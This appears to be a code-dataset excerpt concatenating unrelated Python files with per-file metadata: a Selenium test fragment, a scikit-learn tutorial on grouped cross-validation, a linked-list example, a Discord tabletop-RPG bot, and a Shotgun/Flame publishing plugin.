Cedula=Selenium.leer_celda(self, 'K7')
EventLogin.Loguin(self,Cedula,Cedula)
EventTC.AceptarTratamientoDatos(self)
EventTC.AceptarEnrolamiento(self)
EventTC.AceptarFirmaElectronica(self)
EventAD.AprobacionDocumento(self)
Selenium.esperar(self, 2)
if __name__ == '__main__':
unittest.main()
| 34.230769 | 79 | 0.764045 | 87 | 890 | 7.666667 | 0.505747 | 0.049475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002688 | 0.164045 | 890 | 25 | 80 | 35.6 | 0.893817 | 0 | 0 | 0 | 0 | 0 | 0.033708 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.285714 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
622532b597cc4879ef93c8058719514e0a489cfd | 6,624 | py | Python | python_scripts/cross_validation_grouping.py | aquinquenel/scikit-learn-mooc | edb91f1669ffad65038f5bf48a6771299be4c09d | [
"CC-BY-4.0"
] | 1 | 2022-02-17T13:13:52.000Z | 2022-02-17T13:13:52.000Z | python_scripts/cross_validation_grouping.py | aquinquenel/scikit-learn-mooc | edb91f1669ffad65038f5bf48a6771299be4c09d | [
"CC-BY-4.0"
] | null | null | null | python_scripts/cross_validation_grouping.py | aquinquenel/scikit-learn-mooc | edb91f1669ffad65038f5bf48a6771299be4c09d | [
"CC-BY-4.0"
] | null | null | null | # ---
# jupyter:
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# %% [markdown]
# # Sample grouping
# We are going to linger into the concept of sample groups. As in the previous
# section, we will give an example to highlight some surprising results. This
# time, we will use the handwritten digits dataset.
# %%
from sklearn.datasets import load_digits
digits = load_digits()
data, target = digits.data, digits.target
# %% [markdown]
# We will recreate the same model used in the previous exercise:
# a logistic regression classifier with preprocessor to scale the data.
# %%
from sklearn.preprocessing import MinMaxScaler
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline
model = make_pipeline(MinMaxScaler(), LogisticRegression(max_iter=1_000))
# %% [markdown]
# We will use the same baseline model. We will use a `KFold` cross-validation
# without shuffling the data at first.
# %%
from sklearn.model_selection import cross_val_score, KFold
cv = KFold(shuffle=False)
test_score_no_shuffling = cross_val_score(model, data, target, cv=cv,
n_jobs=2)
print(f"The average accuracy is "
f"{test_score_no_shuffling.mean():.3f} +/- "
f"{test_score_no_shuffling.std():.3f}")
# %% [markdown]
# Now, let's repeat the experiment by shuffling the data within the
# cross-validation.
# %%
cv = KFold(shuffle=True)
test_score_with_shuffling = cross_val_score(model, data, target, cv=cv,
n_jobs=2)
print(f"The average accuracy is "
f"{test_score_with_shuffling.mean():.3f} +/- "
f"{test_score_with_shuffling.std():.3f}")
# %% [markdown]
# We observe that shuffling the data improves the mean accuracy.
# We could go a little further and plot the distribution of the testing
# score. We can first concatenate the test scores.
# %%
import pandas as pd
all_scores = pd.DataFrame(
[test_score_no_shuffling, test_score_with_shuffling],
index=["KFold without shuffling", "KFold with shuffling"],
).T
# %% [markdown]
# Let's plot the distribution now.
# %%
import matplotlib.pyplot as plt
all_scores.plot.hist(bins=10, edgecolor="black", alpha=0.7)
plt.xlim([0.8, 1.0])
plt.xlabel("Accuracy score")
plt.legend(bbox_to_anchor=(1.05, 0.8), loc="upper left")
_ = plt.title("Distribution of the test scores")
# %% [markdown]
# The cross-validation testing error that uses the shuffling has less
# variance than the one that does not impose any shuffling. It means that some
# specific fold leads to a low score in this case.
# %%
print(test_score_no_shuffling)
# %% [markdown]
# Thus, there is an underlying structure in the data that shuffling will break
# and get better results. To get a better understanding, we should read the
# documentation shipped with the dataset.
# %%
print(digits.DESCR)
# %% [markdown]
# If we read carefully, 13 writers wrote the digits of our dataset, accounting
# for a total amount of 1797 samples. Thus, a writer wrote several times the
# same numbers. Let's suppose that the writer samples are grouped.
# Subsequently, not shuffling the data will keep all writer samples together
# either in the training or the testing sets. Mixing the data will break this
# structure, and therefore digits written by the same writer will be available
# in both the training and testing sets.
#
# Besides, a writer will usually tend to write digits in the same manner. Thus,
# our model will learn to identify a writer's pattern for each digit instead of
# recognizing the digit itself.
#
# We can solve this problem by ensuring that the data associated with a writer
# should either belong to the training or the testing set. Thus, we want to
# group samples for each writer.
#
# Indeed, we can recover the groups by looking at the target variable.
# %%
target[:200]
# %% [markdown]
#
# It might not be obvious at first, but there is a structure in the target:
# there is a repetitive pattern that always starts by some series of ordered
# digits from 0 to 9 followed by random digits at a certain point. If we look
# in details, we see that there is 14 such patterns, always with around 130
# samples each.
#
# Even if it is not exactly corresponding to the 13 writers in the
# documentation (maybe one writer wrote two series of digits), we can
# make the hypothesis that each of these patterns corresponds to a different
# writer and thus a different group.
# %%
from itertools import count
import numpy as np
# defines the lower and upper bounds of sample indices
# for each writer
writer_boundaries = [0, 130, 256, 386, 516, 646, 776, 915, 1029,
1157, 1287, 1415, 1545, 1667, 1797]
groups = np.zeros_like(target)
lower_bounds = writer_boundaries[:-1]
upper_bounds = writer_boundaries[1:]
for group_id, lb, up in zip(count(), lower_bounds, upper_bounds):
groups[lb:up] = group_id
# %% [markdown]
# We can check the grouping by plotting the indices linked to writer ids.
# %%
plt.plot(groups)
plt.yticks(np.unique(groups))
plt.xticks(writer_boundaries, rotation=90)
plt.xlabel("Target index")
plt.ylabel("Writer index")
_ = plt.title("Underlying writer groups existing in the target")
# %% [markdown]
# Once we group the digits by writer, we can use cross-validation to take this
# information into account: the class containing `Group` should be used.
# %%
from sklearn.model_selection import GroupKFold
cv = GroupKFold()
test_score = cross_val_score(model, data, target, groups=groups, cv=cv,
n_jobs=2)
print(f"The average accuracy is "
f"{test_score.mean():.3f} +/- "
f"{test_score.std():.3f}")
# %% [markdown]
# We see that this strategy is less optimistic regarding the model generalization
# performance. However, this is the most reliable if our goal is to make
# handwritten digits recognition writers independent. Besides, we can as well
# see that the standard deviation was reduced.
# %%
all_scores = pd.DataFrame(
[test_score_no_shuffling, test_score_with_shuffling, test_score],
index=["KFold without shuffling", "KFold with shuffling",
"KFold with groups"],
).T
# %%
all_scores.plot.hist(bins=10, edgecolor="black", alpha=0.7)
plt.xlim([0.8, 1.0])
plt.xlabel("Accuracy score")
plt.legend(bbox_to_anchor=(1.05, 0.8), loc="upper left")
_ = plt.title("Distribution of the test scores")
# %% [markdown]
# As a conclusion, it is really important to take any sample grouping pattern
# into account when evaluating a model. Otherwise, the results obtained will
# be over-optimistic in regards with reality.
| 33.624365 | 81 | 0.726449 | 1,001 | 6,624 | 4.727273 | 0.332667 | 0.028529 | 0.013948 | 0.025359 | 0.20541 | 0.172866 | 0.156382 | 0.137785 | 0.137785 | 0.137785 | 0 | 0.020826 | 0.180857 | 6,624 | 196 | 82 | 33.795918 | 0.851272 | 0.557971 | 0 | 0.30303 | 0 | 0 | 0.201977 | 0.067444 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.151515 | 0 | 0.151515 | 0.075758 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6226925f72a08608a36cb3ffbbec7e4e50c599b0 | 732 | py | Python | linkedlist/length_of_linkedlist.py | dhruvilgandhi/DSA-Together-HacktoberFest | fda752e0622544c83e11f1caf1cc99f36792069e | [
"MIT"
] | 16 | 2021-10-02T20:10:51.000Z | 2022-03-06T10:31:11.000Z | linkedlist/length_of_linkedlist.py | dhruvilgandhi/DSA-Together-HacktoberFest | fda752e0622544c83e11f1caf1cc99f36792069e | [
"MIT"
] | 55 | 2021-10-02T07:31:41.000Z | 2021-10-30T06:19:26.000Z | linkedlist/length_of_linkedlist.py | dhruvilgandhi/DSA-Together-HacktoberFest | fda752e0622544c83e11f1caf1cc99f36792069e | [
"MIT"
] | 36 | 2021-10-02T18:00:08.000Z | 2022-01-03T18:50:35.000Z | class Node :
def __init__ (self , data):
self.data = data
self.next = None
class LinkedList:
def __init__(self):
self.head = None
def insertNode(self , value):
newNode = Node(value)
newNode.next = self.head
self.head = newNode
def getLength(self) :
temp = self.head
count = 0
while(temp):
count += 1
temp = temp.next
return count
if __name__ == '__main__':
MyList = LinkedList()
MyList.insertNode(10)
MyList.insertNode(20)
MyList.insertNode(30)
MyList.insertNode(40)
MyList.insertNode(50)
len_list = MyList.getLength()
print("Length of the Linked List is : " , len_list)
| 23.612903 | 55 | 0.575137 | 84 | 732 | 4.797619 | 0.440476 | 0.198511 | 0.054591 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024292 | 0.325137 | 732 | 30 | 56 | 24.4 | 0.791498 | 0 | 0 | 0 | 0 | 0 | 0.053279 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148148 | false | 0 | 0 | 0 | 0.259259 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6226c2ab2a637d69d5940ef47a6fc0d0d6f0975f | 18,434 | py | Python | main.py | moose705/moosebot | 87aa2fe0b61fa3201a9d8977568f1fbf4da73491 | [
"Unlicense"
] | null | null | null | main.py | moose705/moosebot | 87aa2fe0b61fa3201a9d8977568f1fbf4da73491 | [
"Unlicense"
] | null | null | null | main.py | moose705/moosebot | 87aa2fe0b61fa3201a9d8977568f1fbf4da73491 | [
"Unlicense"
] | null | null | null | import os
import random
import sys
from dotenv import load_dotenv
import characters
import items
import names
import random_lists
import shared_functions
import traits
import wizard
from bot import bot as bot
from shared_functions import party as party
from shared_functions import npcs as npcs
from shared_functions import world as world
# below: laziness
load_dotenv()
TOKEN = os.getenv("TOKEN")
# Party & NPC Management
next_backstory = None
next_name = None
next_short_name = None
@bot.command(name='countitems')
async def count_items(ctx):
await ctx.send("There are " + str(len(items.item_dict)) + " items currently in the item pool.")
@bot.command(name='countbackstories')
async def count_backstories(ctx):
num_backstories = len(random_lists.Backstories)
await ctx.send("There are " + str(num_backstories) + " backstories currently in the backstory pool.")
@bot.command(name='nextname')
async def next_name_function(ctx, name):
global next_short_name
global next_name
next_short_name = name.split(" ")[0]
if shared_functions.find_character(next_short_name) is not None:
await ctx.send("A character already exists with the name " + next_short_name + ".")
next_short_name = None
return
next_name = name
@bot.command(name='nextbackstory')
async def next_backstory_function(ctx, backstory):
global next_backstory
next_backstory = backstory
@bot.command(name='additem', aliases=["item"])
async def add_item(ctx, name, item):
character = shared_functions.find_character(name)
if not character:
await ctx.send("Character does not exist!")
return
for i in range(0, len(character["Inventory"])):
if character["Inventory"][i] == "Empty slot" or character["Inventory"][i] == "Empty Slot":
character["Inventory"][i] = item
break
else:
await ctx.send(name + "'s inventory is full!")
return
await ctx.send(embed=characters.print_character(name))
@bot.command(name='removeitem', aliases=["take", "drop"])
async def remove_item(ctx, name, item):
character = shared_functions.find_character(name)
if not character:
await ctx.send("Character does not exist!")
return
length = len(item)
for i in range(0, len(character["Inventory"])):
print(character["Inventory"][i][0:length])
if character["Inventory"][i][0:length] == item:
character["Inventory"][i] = "Empty slot"
break
else:
await ctx.send("Item not found.")
return
await ctx.send(embed=characters.print_character(name))
@bot.command(name='pay', aliases=["givemoney", "givegold"])
async def pay(ctx, name, gold):
await increase(ctx, name, "Gold", gold)
@bot.command(name='increase', aliases=["increasestat", "boost", "booststat"])
async def increase(ctx, name, stat, number):
try:
number = int(number)
except ValueError:
await ctx.send("Stat must be increased by a number.")
return
character = shared_functions.find_character(name)
if not character:
await ctx.send("Character " + name + " does not exist")
return
if stat not in character:
await ctx.send("Stat " + stat + " does not exist")
return
try:
# prevent some jackass from crashing bot by trying to increase "Backstory"
int(character[stat])
except ValueError:
await ctx.send("Are you trying to increase a non-numerical stat...?")
return
character[stat] += number
await ctx.send(embed=characters.print_character(name))
@bot.command(name='decrease', aliases=["lowerstat", "decreasestat", "lower"])
async def decrease(ctx, name, stat, number):
await increase(ctx, name, stat, -int(number))
@bot.command(name='damage', aliases=["hurt"])
async def damage(ctx, name, number):
await decrease(ctx, name, "Health", number)
character = shared_functions.find_character(name)
if character and character["Health"] <= 0:
await kill_char(ctx, name)
@bot.command(name='heal', aliases=["restore"])
async def heal(ctx, name, number=None):
if number is not None:
await increase(ctx, name, "Health", number)
else:
character = shared_functions.find_character(name)
if not character:
await ctx.send("Character " + name + " does not exist, dummy")
return
# hardcoded max health right now; will eventually need to change to a character["Max Health"] attribute if i
# implement things like Blessing of Bloat
characters.change_character_data(name, "Health", 2 * character["Strongness"] + 1)
await ctx.send(embed=characters.print_character(name))
@bot.command(name='check', aliases=["statcheck"])
async def check(ctx, name, stat, required_number, global_modifier=0):
try:
required_number = int(required_number)
except ValueError:
target = shared_functions.find_character(required_number)
if not target:
await ctx.send("There is no character named " + required_number)
return
if stat not in target:
await ctx.send(required_number + " has no stat " + stat)
return
required_number = target[stat]
# get required_number from target stat.
character = shared_functions.find_character(name)
if not character:
await ctx.send("There is no character named " + name)
return
try:
global_modifier = int(global_modifier)
except ValueError:
await ctx.send("Modifier is not a number...")
return
if stat not in character:
await ctx.send(name + " has no stat " + stat)
return
global_modifier += world["modifier"]
roll = random.randint(1, 20)
print(roll)
passed = False
if roll == 20:
passed = True
elif roll == 1:
pass
else:
if (character[stat] - required_number) + roll + global_modifier >= 11:
passed = True
if passed:
await ctx.send(stat + " check passed!")
else:
await ctx.send(stat + " check failed!")
@bot.command(name='combat', aliases=["fight", "attack"])
async def combat(ctx, name, weapon_damage, target, global_modifier=0, stat="Strongness"):
damage_target = False
try:
defense = int(target)
except ValueError:
target_character = shared_functions.find_character(target)
if not target_character:
await ctx.send("Could not find target.")
return
if stat in target_character:
defense = target_character[stat]
else:
await ctx.send("Stat does not exist.")
damage_target = True
try:
global_modifier = int(global_modifier)
weapon_damage = int(weapon_damage)
except ValueError:
await ctx.send("One of the numerical parameters was not a number.")
return
character = shared_functions.find_character(name)
global_modifier += world["modifier"]
if not character:
await ctx.send("No character named " + name)
return
if stat not in character:
await ctx.send("Invalid stat")
return
roll = random.randint(1, 20)
print(roll)
miss = False
crit = 1
if roll == 20:
crit = 2
if roll == 1:
miss = True
else:
damage_done = (character[stat] - defense + roll + global_modifier - 10) * (weapon_damage * crit)
if damage_done < 0:
damage_done = 0
if miss:
await ctx.send("Missed!")
else:
if damage_target and damage_done > 0:
await damage(ctx, target, damage_done)
await ctx.send("Did " + str(damage_done) + " damage!")
if crit > 1:
await ctx.send("A critical hit!")
@bot.command(name='killchar', aliases=["kill", "nuke"])
async def kill_char(ctx, name):
# TODO: Have a character drop their entire inventory upon being killed, activating any explosives.
# It would be pretty comical to randomly trigger %use (prompting for a target if necessary).
# TODO: File away deceased characters in an additional dictionary for use with Necromancer.
character = shared_functions.find_character(name)
if not character:
await ctx.send("Could not find party member or NPC named " + name)
return
if name in npcs.keys():
relevant_dict = npcs
else:
relevant_dict = party
# later: add to necromancy dictionary
response = "**" + relevant_dict[name]["Name"] + " has been slain.**"
for item in relevant_dict[name]["Inventory"]:
if item != "Empty slot":
response += "\nThe following item dropped: " + items.item_dict[item].print_teaser()
relevant_dict.pop(name, False)
shared_functions.backup_characters()
await ctx.send(response)
@bot.command(name='party')
async def print_party(ctx, name=None):
if not name:
for character_name in party.keys():
response = characters.print_character(character_name)
await ctx.send(embed=response)
else:
response = characters.print_character(name)
await ctx.send(embed=response)
@bot.command(name='npc')
async def npc(ctx, name=None):
if not name:
length = str(len(npcs.keys()))
await ctx.send("There are currently " + length + " NPCs in the pool.")
return
if name == "all":
for character in npcs:
await ctx.send(embed=characters.print_character(character))
else:
await ctx.send(embed=characters.print_character(name))
@bot.command(name='randnpc')
async def randnpc(ctx):
if len(npcs.keys()) == 0:
await ctx.send("There are no NPCs!")
return
npc = random.choice(list(npcs.keys()))
await ctx.send(embed=characters.print_character(npc))
@bot.command(name='recruit', aliases=["hire", "addparty"])
async def recruit(ctx, name):
npc = npcs[name]
npcs.pop(name)
party[name] = npc
shared_functions.backup_characters()
await ctx.send(name + " added to party!")
@bot.command(name='fire', aliases=['retire', 'kick', 'ditch'])
async def leave(ctx, name):
try:
npc = party[name]
except KeyError:
await ctx.send("No party member named " + name)
return
party.pop(name)
npcs[name] = npc
await ctx.send(name + " removed from party!")
shared_functions.backup_characters()
@bot.command(name='wipeparty')
async def wipe_party(ctx):
global party
party = {}
shared_functions.backup_party()
await ctx.send("Successfully killed entire party.")
@bot.command(name='retireparty', aliases=["giveup", "win"])
async def retire_party(ctx):
for name in list(party.keys()):
await leave(ctx, name)
await advance(ctx, 1)
await ctx.send("Entire party has been retired.")
@bot.command(name='inventorysize')
async def inventory_size(ctx, name, size):
character = shared_functions.find_character(name)
if not character:
await ctx.send("Character does not exist!")
return
try:
int(size)
except ValueError:
await ctx.send("That is not a number you moron!")
return
length = len(party[name]["Inventory"])
if length > int(size):
party[name]["Inventory"] = party[name]["Inventory"][0:int(size)]
elif length < int(size):
for i in range(length, int(size)):
party[name]["Inventory"].append("Empty slot")
else:
await ctx.send("Character already has inventory of size " + size + ".")
return
await ctx.send(embed=characters.print_character(name))
@bot.command(name='restart')
async def restart(ctx):
sys.exit()
@bot.command(name='go', aliases=['advance', 'nextworld'])
async def advance(ctx, reset=False):
# future support: track actual world map position, take a direction as argument
world["number"] += 1
world["modifier"] = 1 - int(((world["number"] + 1) / 2))
world["stat cap"] = world["number"] + 4
world["boss stat cap"] = world["number"] + 6
if reset:
world["number"] = 1
world["modifier"] = 1
world["stat cap"] = 5
world["boss stat cap"] = 7
shared_functions.backup_world(world)
await(ctx.send("World has been set to " + str(world["number"]) + " providing a boost of " + str(
world["modifier"]) + " to all rolls."))
@bot.command(name='randchar')
async def random_char(ctx, boss=False):
if boss:
stat_cap = world["boss stat cap"]
else:
stat_cap = world["stat cap"]
if world["number"] <= 0:
await ctx.send("Invalid world.")
return
global next_backstory
global next_short_name
global next_name
if next_backstory:
backstory = next_backstory
next_backstory = None
else:
backstory = random.choice(random_lists.Backstories)
if next_short_name:
first_name = next_short_name
next_short_name = None
else:
first_name = random.choice(names.Names)
while first_name in npcs.keys():
first_name = random.choice(names.Names)
if next_name:
full_name = next_name
next_name = None
else:
middle_name = None
if random.randint(1, 2) == 2:
middle_name = random.choice(names.Names)
last_name = random.choice(names.Names)
if middle_name:
full_name = first_name + " " + middle_name + " " + last_name
else:
full_name = first_name + " " + last_name
strongness = random.randint(0, stat_cap)
smartness = random.randint(0, stat_cap)
coolness = random.randint(0, stat_cap)
health = 2 * strongness + 1
gold = random.randint(0, stat_cap * 10)
blessing_level = None
blessing_roll = random.randint(1, 20)
if blessing_roll <= world["number"]:
blessing_level = "Level I"
blessing_roll = random.randint(1, 20)
if blessing_roll <= world["number"]:
blessing_level = "Level II"
blessing_roll = random.randint(1, 20)
if blessing_roll <= world["number"]:
blessing_level = "Level III"
blessing_name = random.choice(random_lists.Blessings)
if blessing_level is None:
blessing = "No blessing"
else:
blessing = "**Blessing of " + blessing_name + "** " + blessing_level
trait1 = random.choice(list(traits.trait_dict.keys()))
trait2 = trait1
while trait2 == trait1:
trait2 = random.choice(list(traits.trait_dict.keys()))
color_string = shared_functions.random_color()
inventory = []
for i in range(0, 3):
if random.randint(1, 4) == 1:
inventory.append((await items.random_item(ctx, -2 * world["number"], 1, False)).name)
else:
inventory.append("Empty slot")
if boss:
backstory = random.choice(random_lists.BossBackstories)
trait1 = random.choice(list(traits.boss_trait_dict.keys()))
health *= (5 * world["number"])
gold *= (world["number"] * world["number"])
full_name = "*Boss:* " + full_name
secondary_trait_roll = random.randint(1, 20)
if secondary_trait_roll <= world["number"]:
trait2 = random.choice(traits.boss_trait_dict)
while trait1 == trait2:
trait2 = random.choice(traits.boss_trait_dict)
character = {"Backstory": backstory, "Name": full_name, "Traits": [trait1, trait2], "Smartness": smartness,
"Coolness": coolness, "Strongness": strongness, "Health": health, "Gold": gold, "Color": color_string,
"Inventory": inventory, "Blessing": blessing}
npcs[first_name] = character
await ctx.send(embed=characters.print_character(first_name))
shared_functions.backup_characters()
@bot.command(name='randboss')
async def random_boss(ctx):
await random_char(ctx, True)
@bot.command(name='encounter')
async def encounter(ctx):
world_number = world["number"]
roll = random.randint(1, 99)
if roll > 66:
await randnpc(ctx)
elif roll < world_number + 1:
await random_boss(ctx)
else:
await random_char(ctx)
@bot.command(name="sell")
async def sell(ctx, character_name, item_name, show_price=False):
# TODO: Add support to attempt to sell an item to an NPC.
character = shared_functions.find_character(character_name)
if not character:
await ctx.send("No character named " + character_name)
return
if item_name not in items.item_dict.keys():
await ctx.send("No item named " + item_name)
return
if item_name not in character["Inventory"]:
await ctx.send(character_name + " does not have " + item_name + " in their inventory!")
return
item = items.item_dict[item_name]
if item.quality == 0:
price = 0
elif item.quality == 1:
price = 1
elif item.quality == 2:
price = 10
elif item.quality == 3:
price = 50
elif item.quality == 4:
price = 100
elif item.quality == 5:
price = 1000
if show_price:
await ctx.send("Selling this item will net you ", price, " gold.")
else:
character["Gold"] += price
await remove_item(ctx, character_name, item_name)
shared_functions.backup_characters()
# Selling to NPC: Good roll: NPC will buy for close to full price if they have enough gold, and tell you 'I can't
# afford that' otherwise. Bad roll: NPC will buy for low price close to store price. If NPC doesn't have enough
# gold still, they will offer all their gold.
@bot.event
async def on_message(message):
# Currently, if the bot is down, it will not check the channel history to see if it missed any inputs
# while it was down. This is not too hard to do (save the message ID of the latest read message in the JSON,
# then get history in this channel since that message and iterate through all missed messages on boot,
# disregarding all but the first from each user).
# If there is ever a need for message-by-message scanning, the wizard can be safely tucked into a function and left
# in wizards.py, with the actual event moved to main.
if message.channel.id == 714589518983987212 or message.channel.id == 714628821646835889:
await wizard.wizard_main(message)
await bot.process_commands(message)
bot.run(TOKEN)
| 33.948435 | 119 | 0.644895 | 2,392 | 18,434 | 4.867475 | 0.1551 | 0.038478 | 0.057717 | 0.025251 | 0.329468 | 0.24985 | 0.21455 | 0.144722 | 0.127115 | 0.104355 | 0 | 0.010823 | 0.243138 | 18,434 | 542 | 120 | 34.01107 | 0.823681 | 0.083216 | 0 | 0.324444 | 0 | 0 | 0.130169 | 0 | 0 | 0 | 0 | 0.001845 | 0 | 1 | 0 | false | 0.013333 | 0.033333 | 0 | 0.1 | 0.035556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6226ffeed9557970bd6934e3d43f418e0b388671 | 7,274 | py | Python | bundle_cache/app_store/tk-flame/v1.14.4/hooks/tk-multi-publish2/update_cut_item.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | 4 | 2019-01-11T03:41:28.000Z | 2019-09-12T06:57:17.000Z | bundle_cache/app_store/tk-flame/v1.14.4/hooks/tk-multi-publish2/update_cut_item.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | null | null | null | bundle_cache/app_store/tk-flame/v1.14.4/hooks/tk-multi-publish2/update_cut_item.py | ColinKennedy/tk-config-default2-respawn | 855fb8033daa549b92615792442f19a7f9c4f55c | [
"Linux-OpenIB"
] | 2 | 2019-01-10T05:00:18.000Z | 2020-02-15T16:32:56.000Z | # Copyright (c) 2017 Shotgun Software Inc.
#
# CONFIDENTIAL AND PROPRIETARY
#
# This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit
# Source Code License included in this distribution package. See LICENSE.
# By accessing, using, copying or modifying this work you indicate your
# agreement to the Shotgun Pipeline Toolkit Source Code License. All rights
# not expressly granted therein are reserved by Shotgun Software Inc.
import os
import sgtk
HookBaseClass = sgtk.get_hook_baseclass()
class UpdateCutPlugin(HookBaseClass):
"""
Plugin for creating generic publishes in Shotgun
"""
def __init__(self, *args, **kwrds):
super(UpdateCutPlugin, self).__init__(*args, **kwrds)
self.publisher = self.parent
self.engine = self.publisher.engine
self.sg = self.engine.shotgun
@property
def icon(self):
"""
Path to an png icon on disk
"""
# look for icon one level up from this hook's folder in "icons" folder
return os.path.join(
self.disk_location,
os.pardir,
"icons",
"publish.png"
)
@property
def name(self):
"""
One line display name describing the plugin
"""
return "Update Cut Item"
@property
def description(self):
"""
Verbose, multi-line description of what the plugin does. This can
contain simple html for formatting.
"""
return "Update cut items in Shotgun for the given object"
@property
def settings(self):
"""
Dictionary defining the settings that this plugin expects to recieve
through the settings parameter in the accept, validate, publish and
finalize methods.
A dictionary on the following form:
{
"Settings Name": {
"type": "settings_type",
"default": "default_value",
"description": "One line description of the setting"
}
The type string should be one of the data types that toolkit accepts
as part of its environment configuration.
"""
return {}
@property
def item_filters(self):
"""
List of item types that this plugin is interested in.
Only items matching entries in this list will be presented to the
accept() method. Strings can contain glob patters such as *, for example
["maya.*", "file.maya"]
"""
return ["flame.batchOpenClip"]
def accept(self, settings, item):
"""
Method called by the publisher to determine if an item is of any
interest to this plugin. Only items matching the filters defined via the
item_filters property will be presented to this method.
A publish task will be generated for each item accepted here. Returns a
dictionary with the following booleans:
- accepted: Indicates if the plugin is interested in this value at
all. Required.
- enabled: If True, the plugin will be enabled in the UI, otherwise
it will be disabled. Optional, True by default.
- visible: If True, the plugin will be visible in the UI, otherwise
it will be hidden. Optional, True by default.
- checked: If True, the plugin will be checked in the UI, otherwise
it will be unchecked. Optional, True by default.
:param settings: Dictionary of Settings. The keys are strings, matching
the keys returned in the settings property. The values are `Setting`
instances.
:param item: Item to process
:returns: dictionary with boolean keys accepted, required and enabled
"""
# Make sure that the Shotgun backend support Cuts
cut_supported = self.sg.server_caps.version >= (7, 0, 0)
# Only available on Shot context
shot_context = item.context.entity and item.context.entity.get("type") == "Shot"
accepted = cut_supported and shot_context and item.properties.get("fromBatch", False)
# If the context is correct, try to find the CutItem to Update
if accepted:
item.properties["CutItem"] = self.sg.find_one("CutItem", [["shot", "is", item.context.entity]],
["cut_order", "cut"], [
{"field_name": "cut.Cut.revision_number",
"direction": "desc"}])
# Accept only if we know what CutItem to update
accepted = item.properties["CutItem"] is not None
return {"accepted": accepted}
def validate(self, settings, item):
"""
Validates the given item to check that it is ok to publish.
Returns a boolean to indicate validity.
:param settings: Dictionary of Settings. The keys are strings, matching
the keys returned in the settings property. The values are `Setting`
instances.
:param item: Item to process
:returns: True if item is valid, False otherwise.
"""
return True
def publish(self, settings, item):
"""
Executes the publish logic for the given item and settings.
:param settings: Dictionary of Settings. The keys are strings, matching
the keys returned in the settings property. The values are `Setting`
instances.
:param item: Item to process
"""
asset_info = item.properties["assetInfo"]
path = item.properties["path"]
cut_item = item.properties["CutItem"]
version = item.properties.get("Version")
# If the current Publish session had created a Version, we push it to the CutItem to update
if version:
self.sg.update("CutItem", cut_item["id"], {"version": version})
# Build the thumbnail generation target list
targets = [cut_item]
# If the CutItem is the first one of the Cut, we update the Cut preview
if cut_item["cut_order"] == 1:
cut = cut_item["cut"]
targets.append(cut)
# For file sequences, the hooks we want the path as provided by flame.
path = item.properties.get("file_path", path)
# Create the Image thumbnail in background
self.engine.thumbnail_generator.generate(
display_name=item.name,
path=path,
dependencies=item.properties.get("backgroundJobId"),
target_entities=targets,
asset_info=asset_info
)
def finalize(self, settings, item):
"""
Execute the finalization pass. This pass executes once
all the publish tasks have completed, and can for example
be used to version up files.
:param settings: Dictionary of Settings. The keys are strings, matching
the keys returned in the settings property. The values are `Setting`
instances.
:param item: Item to process
"""
self.engine.thumbnail_generator.finalize(path=item.properties["path"])
| 35.656863 | 107 | 0.609568 | 871 | 7,274 | 5.047072 | 0.30884 | 0.031847 | 0.014559 | 0.022748 | 0.19404 | 0.184941 | 0.17061 | 0.154231 | 0.134213 | 0.134213 | 0 | 0.001613 | 0.318257 | 7,274 | 203 | 108 | 35.832512 | 0.884856 | 0.535194 | 0 | 0.079365 | 0 | 0 | 0.105588 | 0.008345 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15873 | false | 0 | 0.031746 | 0 | 0.31746 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62287a7aba5381a1acde55098def7cb98cca56ed | 10,230 | py | Python | modules/raytrace_tools.py | rsiverd/mayhem | 6dc0fa667f8e37d46d63cab86eba0e832e51f8f1 | [
"BSD-2-Clause"
] | null | null | null | modules/raytrace_tools.py | rsiverd/mayhem | 6dc0fa667f8e37d46d63cab86eba0e832e51f8f1 | [
"BSD-2-Clause"
] | null | null | null | modules/raytrace_tools.py | rsiverd/mayhem | 6dc0fa667f8e37d46d63cab86eba0e832e51f8f1 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
